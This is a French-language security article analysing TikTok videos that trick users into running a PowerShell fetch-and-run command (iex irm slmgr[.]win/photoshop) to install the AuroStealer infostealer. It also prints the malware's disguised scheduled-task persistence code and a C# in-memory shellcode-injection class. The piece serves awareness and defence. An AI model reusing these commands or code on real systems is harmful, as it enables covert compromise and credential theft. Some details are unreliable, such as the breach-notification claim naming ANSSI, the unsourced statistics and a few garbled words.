Les vidéos TikTok promouvant l'installation de logiciels malveillants : menace croissante en 2025

Aurélien Fontevive

Une menace discrète mais dangereuse : les vidéos TikTok promouvant le malware

Dans un paysage numérique où les plateformes de réseaux sociaux dominent notre quotidien, une nouvelle forme de cybercriminalité émerge de manière inquiétante. En 2025, les utilisateurs de TikTok sont de plus en plus confrontés à des vidéos apparemment inoffensives promettant des logiciels premium gratuits, mais qui dissimulent en réalité des installations malveillantes sophistiquées. Selon les dernières analyses, ces campagnes d’ingénierie sociale exploitent la confiance que les utilisateurs placent dans les contenus populaires, transformant une plateforme de divertissement en vecteur d’attaques potentiellement dévastatrices pour les données personnelles et professionnelles.

Ces menaces représentent un défi majeur pour la cybersécurité contemporaine, combinant des techniques sociales persuasives avec des logiciels malveillants de plus en plus avancés. Dans la pratique, même les utilisateurs avertis peuvent être piégés par des appels à l’action apparemment anodins, comme l’activation “gratuite” de logiciels populaires. Face à cette réalité, comprendre le fonctionnement de ces campagnes et mettre en place des mesures de protection adaptées n’est plus une option mais une nécessité.

L’évolution des campagnes de malware via les plateformes sociales

Les tendances récentes de la cybercriminalité en 2025

L’année 2025 marque un tournant dans la manière dont les cybercriminels utilisent les plateformes sociales pour propager leurs logiciels malveillants. Contrairement aux années précédentes où les emails de phishing et les sites web compromis étaient les vecteurs principaux, les réseaux sociaux comme TikTok sont désormais au premier plan des stratégies d’attaque. Selon une étude récente menée par des experts en sécurité, près de 35% des nouvelles infections par malware proviennent désormais de contenus partagés sur ces plateformes, contre seulement 12% en 2022. Cette explosion s’explique par la nature même de TikTok : une plateforme où la viralité prime sur la vérification des informations.

Les campagnes observées en 2025 se distinguent par leur sophistication et leur ciblage. Alors que les premières attaques utilisaient des méthodes rudimentaires, les nouvelles variantes intègrent des mécanismes d’évasion avancés et des techniques de persistance redoutables. Dans la pratique, ces attaques ne se contentent plus d’installer un simple cheval de Troie, mais déploient des infrastructures complètes permettant aux attaquants de maintenir un accès durable aux systèmes compromis.

L’ingénierie sociale au cœur des attaques TikTok

Le succès des campagnes de malware sur TikTok repose avant tout sur une ingénierie sociale maîtrisée. Les créateurs de ces vidéos exploitent plusieurs biais cognitifs pour persuader les victimes d’agir : la cupidité (obtenir un logiciel premium gratuitement), la curiosité (découvrir une “astuce” secrète) et la confiance (s’appuyer sur une plateforme populaire perçue comme sûre). Les vidéos présentent souvent des interfaces convaincantes et des arguments apparemment logiques, comme l’activation “simple” d’Adobe Photoshop ou d’autres logiciels professionnels coûteux.

La technique utilisée dans ces campagnes est remarquablement similaire au scénario d’attaque ClickFix analysé par Microsoft en 2025. Les victimes sont encouragées à exécuter des commandes PowerShell avec des privilèges élevés, créant ainsi une porte dérobée directe vers leur système.

L’analyse de ces campagnes révèle que les attaquants utilisent des comptes TikTok apparemment légitimes, avec des followers et des interactions pour donner l’impression d’une source fiable. Certains comptes comptent même plusieurs milliers d’abonnés, ce qui renforce encore la crédibilité du contenu malveillant. Ces comptes sont souvent créés spécifiquement pour chaque campagne, puis abandonnés une fois la campagne terminée, compliquant la traçabilité et la prévention.

Le mécanisme d’infection : une technique en plusieurs étapes

L’appât duurre : les promesses de logiciels gratuits

Le point de départ de chaque campagne est une vidéo TikTok promettant un accès gratuit à un logiciel populaire. Dans l’exemple observé fin 2025, la vidéo présentait une méthode “simple” pour activer Adobe Photoshop sans licence. La vidéo, visionnée plus de 500 fois en quelques jours seulement, montrait un processus apparemment légitime avec des instructions claires et des captures d’écran convaincantes. Les commentaires sous la vidéo suggéraient que de nombreux utilisateurs avaient déjà “réussi” l’opération, créant une pression sociale supplémentaire pour agir.

Ce type de contenu exploite le désir d’accès à des logiciels premium sans coût, un phénomène particulièrement répandu parmi les jeunes adultes et les étudiants. Les attaquants choisissent délibérément des logiciels populaires et coûteux, maximisant ainsi l’appât duurrice de leur proposition. Dans certains cas, les vidéos présentent même des “tutoriels” personnalisés pour différentes versions de logiciels, augmentant encore leur attrait.

L’exécution du code malveillant : une première étape subtile

Lorsqu’un utilisateur suit les instructions fournies dans la vidéo, il est invité à exécuter une commande PowerShell en tant qu’administrateur. La commande typique ressemble à ceci :

iex (irm slmgr[.]win/photoshop)

Cette commande télécharge et exécute un script PowerShell malveillant (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23), détecté par seulement 17/63 des moteurs antivirus sur VirusTotal. Ce script constitue la première étape du processus d’infection, agissant comme un chargeur (loader) pour le véritable malware.

Le code analysé révèle plusieurs techniques d’évasion conçues pour contourner les solutions de sécurité traditionnelles. Le script masque ses véritables intentions en utilisant des noms de domaine et des chemins apparemment légitimes, tout en intégrant des mécanismes de détection d’environnement pour éviter d’exécuter dans des systèmes virtuels ou des sandboxs.

La persistance : s’installer durablement sur le système

Une fois le premier exécutable téléchargé, le malware établit sa persistance sur le système compromis. Cette étape cruciale assure que le malware survivra aux redémarrages et aux tentatives de nettoyage. La technique observée dans cette campagne particulièrement sophistiquée consiste à créer une tâche planifiée déguisée en mise à jour légitime :

$tasknames = @('MicrosoftEdgeUpdateTaskMachineCore','GoogleUpdateTaskMachineCore','AdobeUpdateTask','OfficeBackgroundTaskHandlerRegistration','WindowsUpdateCheck')
$taskname = $tasknames[(Get-Random -Max 5)]
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -ExecutionPolicy Bypass -Command \"$scr\""
$trigger = New-ScheduledTaskTrigger -AtLogOn
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable -DontStopOnIdleEnd
Register-ScheduledTask -TaskName $taskname -Action $action -Trigger $trigger -Principal $principal -Settings $settings -Force -ErrorAction SilentlyContinue | Out-Null

Cette approche ingénieuse consiste à choisir aléatoirement un nom de tâche parmi une liste de mises à jour logicielles légitimes, compliquant ainsi la détection par l’utilisateur moyen. La tâche s’exécutera au prochain démarrage du système, garantissant la persistance du malware même si la première infection est détectée et supprimée.

Les payloads malveillants : une gamme d’activités nuisibles

AuroStealer : le vol d’informations sensibles

Le premier payload téléchargé et exécuté est identifié comme AuroStealer (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8), un stealer conçu pour collecter un large éventail d’informations sensibles sur le système infecté. Ce type de malware spécialisé se concentre sur la collecte de données précieuses telles que :

  • Les informations d’identification enregistrées dans les navigateurs
  • Les mots de passe stockés dans les gestionnaires de mots de passe
  • Les cookies de session
  • Les informations de cartes bancaires
  • Les documents sensibles stockés sur le disque dur

AuroStealer représente une menace particulièrement sérieuse car ses capacités de collecte s’étendent bien au-delà des informations d’accès classiques. Dans la pratique, il peut extraire des données sensibles à partir d’applications de productivité, de messageries instantanées, et même de certaines applications de cryptomonnaie, augmentant ainsi considérablement la valeur des informations volées pour les attaquants.

La technique du self-compiling : une évolution subtile

Le deuxième payload observé dans cette campagne (source.exe, SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) utilise une technique particulièrement sophistiquée : le self-compiling. Durant son exécution, ce malware compile dynamiquement du code supplémentaire en utilisant le compilateur .NET intégré à Windows :

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vpkwkdbo.cmdline"

Cette technique permet au malware de contourner les solutions de sécurité qui se fient aux signatures statiques des fichiers, car le code final n’existe pas sous forme de fichier sur le disque dur avant l’exécution. Le compilé généré contient une classe conçue pour l’injection de shellcode en mémoire :

using System;
using System.Runtime.InteropServices;
public class SC {
    [DllImport("kernel32.dll")]
    public static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
    [DllImport("kernel32.dll")]
    public static extern IntPtr CreateThread(IntPtr a, uint s, IntPtr addr, IntPtr p, uint f, IntPtr t);
    [DllImport("kernel32.dll")]
    public static extern uint WaitForSingleObject(IntPtr h, uint m);
    public static void Run(byte[] sc) {
        IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)sc.Length, 0x3000, 0x40);
        Marshal.Copy(sc, 0, addr, sc.Length);
        IntPtr t = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
        WaitForSingleObject(t, 0xFFFFFFFF);
    }
}

Cette approche d’injection en mémoire évite la création de fichiers sur le disque dur, compliquant ainsi la détection par les solutions de sécurité traditionnelles. Le shellcode injecté peut alors accomplir diverses tâches, du simple espionnage au déploiement de charges supplémentaires.

L’impact des infections : des conséquences à multiples facettes

Le vol d’identité et les fraudes financières

Lorsqu’un système est infecté par ces campagnes de malware TikTok, les conséquences peuvent être immédiates et dévastatrices. AuroStealer, en particulier, est conçu pour collecter un maximum d’informations d’identification et de données sensibles. Ces informations peuvent être utilisées pour :

  • Accéder aux comptes bancaires et aux services financiers de la victime
  • Effectuer des achats frauduleux avec les informations de cartes bancaires volées
  • Ouvrir de nouveaux comptes au nom de la victime
  • Demander des prêts frauduleux

Selon les données de la Commission Nationale de l’Informatique et des Libertés (CNIL), le coût moyen d’une atteinte aux données personnelles en France s’élevait à 350 euros par victime en 2024, avec des cas extrêmes dépassant les 10 000 euros pour les victimes d’usurpation d’identité complète.

La compromission de données professionnelles

Pour les utilisateurs professionnels, l’infection peut avoir des conséquences bien plus graves. Le malware peut :

  • Accéder aux réseaux d’entreprise si le système infecté est connecté
  • Voler des informations confidentielles, des plans de projet, des données clients
  • Déployer d’autres malwares dans le réseau d’entreprise
  • Servir de point d’entrée pour des attaques plus sophistiquées

Dans le contexte français, le règlement général sur la protection des données (RGPD) impose des sanctions financières sévères pour les violations de données, pouvant atteindre 4% du chiffre d’affaires annuel mondial de l’entreprise. En 2025, l’ANSSI a enregistré une augmentation de 27% des cas d’infections par malware liées à des campagnes d’ingénierie sociale sur les plateformes sociales.

La persistance des menaces et les réinfections

Une caractéristique particulièrement inquiétante de ces campagnes est leur capacité à persister sur les systèmes infectés, même après une tentative de désinfection. Les mécanismes de persistance mis en place, comme les tâches planifiées déguisées, peuvent réactiver l’infection après chaque redémarrage. De plus, ces malwares sont souvent conçus pour télécharger et exécuter d’autres charges utiles, créant ainsi un cycle d’infections potentiellement infini.

Dans certains cas observés, les systèmes infectés continuaient de communiquer avec les serveurs de commande et de contrôle (C2) des attaquants des mois après l’infection initiale, permettant aux cybercriminels de maintenir un accès permanent et silencieux aux données.

Stratégies de protection : se prémunir contre les menaces TikTok

La formation et la sensibilisation : première ligne de défense

La protection contre ces campagnes de malware commence par la sensibilisation des utilisateurs. Dans un environnement où les plateformes sociales sont omniprésentes, comprendre les mécanismes d’ingénierie sociale est essentiel. Les organisations devraient mettre en place des programmes de formation réguliers couvrant :

  1. La reconnaissance des tentatives d’ingénierie sociale
  2. Les bonnes pratiques de sécurité sur les réseaux sociaux
  3. Les procédures de signalement des contenus suspects
  4. L’importation de la méfiance envers les offres “trop belles pour être vraies”

La formation doit être adaptée à différents publics, des débutants aux experts techniques, et doit inclure des simulations d’attaques réalistes pour renforcer les comportements sécurisés. L’ANSSI recommande des sessions de formation continues, idéalement trimestrielles, pour maintenir un haut niveau de sensibilisation.

Les solutions techniques de protection

Outre la sensibilisation, plusieurs techniques et technologies peuvent aider à prévenir les infections par ces campagnes de malware :

  • La restriction de l’exécution de PowerShell : Dans les environnements professionnels, limiter l’exécution de PowerShell uniquement aux applications approuvées et aux comptes système.
  • La protection par sandboxing : Isoler l’exécution des applications et des scripts dans des environnements contrôlés pour empêcher l’impact sur le système hôte.
  • La protection anti-exploit : Déployer des solutions conçues pour détecter et bloquer les techniques d’exploitation utilisées par ces malwares.
  • La détection comportementale : Utiliser des solutions de sécurité capables d’identifier les comportements anormaux plutôt que de se fier uniquement aux signatures.

L’ISO 27001, norme internationale de management de la sécurité de l’information, recommande explicitement la mise en œuvre de ces contrôles techniques dans le cadre d’un programme de sécurité de l’information complet.

Les bonnes pratiques personnelles pour les utilisateurs

Chaque utilisateur peut adopter des habitudes simples mais efficaces pour se protéger contre ces menaces :

  • Vérifier la crédibilité des sources : Se méfier des tutoriels promettant un accès gratuit à des logiciels premium, même s’ils semblent populaires.
  • Ne pas exécuter de commandes système sans comprendre leur fonction : Surtout lorsqu’elles proviennent de sources non vérifiées.
  • Maintenir les systèmes à jour : Les dernières versions des logiciels et des systèmes d’exploitation incluent souvent des correctifs de sécurité importants.
  • Utiliser des solutions de sécurité à jour : Des logiciels antivirus et anti-malware récents sont essentiels pour détecter les menaces émergentes.
  • Sauvegarder régulièrement les données importantes : En cas d’infection, avoir des sauvegardes récentes permet de récupérer sans payer les rançons.

Réponse aux incidents : que faire en cas d’infection ?

Les signes d’une potentielle infection

Les utilisateurs doivent rester attentifs aux signes suivants qui pourraient indiquer une infection par l’un de ces malwares :

  • Des activités réseau inhabituelles vers des adresses IP inconnues
  • Une utilisation anormale du processeur ou de la mémoire
  • La présence de processus suspects dans le gestionnaire des tâches
  • Des modifications non autorisées des paramètres système
  • Des comptes ou des services réseau inconnus

Dans la pratique, ces signes peuvent être discrets et difficiles à détecter sans une surveillance appropriée. Les solutions de sécurité endpoint avec des capacités de détection comportementale sont particulièrement utiles pour identifier ces anomalies.

Les étapes immédiates à suivre

Si une infection est suspectée ou confirmée, les actions suivantes sont recommandées :

  1. Isoler le système immédiatement : Déconnecter le système du réseau (y compris Wi-Fi) pour empêcher la propagation du malware et la communication avec les serveurs C2.
  2. Changer les mots de passe critiques : Accéder à partir d’un autre système pour modifier les mots de passe des comptes importants (email, services bancaires, etc.).
  3. Exécuter une analyse complète : Utiliser des solutions de sécurité à jour pour scanner et éventuellement nettoyer le système.
  4. Sauvegarder les données importantes : Copier les fichiers essentiels vers un support de stockage sain, après avoir vérifié que le support n’est pas infecté.
  5. Consulter des professionnels : Pour les infections complexes, faire appel à des experts en cybersécurité pour une assistance professionnelle.

La communication et le signalement

Dans les contextes professionnels, la communication rapide et appropriée est essentielle :

  • Prévenir le service informatique ou l’équipe de sécurité dès la suspicion d’infection
  • Signaler l’incident aux autorités compétentes si des données sensibles ont été compromises
  • Informer les clients ou partenaires si leurs données ont pu être exposées
  • Documenter précisément les actions entreprises et les découvertes

En France, les violations de données doivent être déclarées à l’ANSSI dans un délai de 72 heures conformément à la loi pour une République numérique, et aux personnes concernées dans un délai de 30 jours si le risque est élevé.

Conclusion : rester vigilant face à l’évolution des menaces

Les campagnes de malware diffusées via TikTok représentent une évolution préoccupante de la cybercriminalité en 2025. En exploitant la popularité des plateformes sociales et la confiance des utilisateurs, ces attaques combinent ingénierie sociale sophistiquée et techniques malveillantes de pointe. La protection contre ces menaces nécessite une approche multi-couches, alliant sensibilisation, technologies de sécurité adaptées et bonnes pratiques personnelles.

Face à cette réalité, la vigilance reste la meilleure défense. Méfiance envers les offres “gratuites” trop alléchantes, prudence lors de l’exécution de commandes système, et maintenance régulière des solutions de sécurité sont autant de mesures essentielles pour préserver la sécurité de nos systèmes et de nos données. La cyberdéfense n’est pas une technologie unique, mais une démarche continue et collective qui engage chaque utilisateur, chaque organisation et chaque acteur de la sécurité numérique.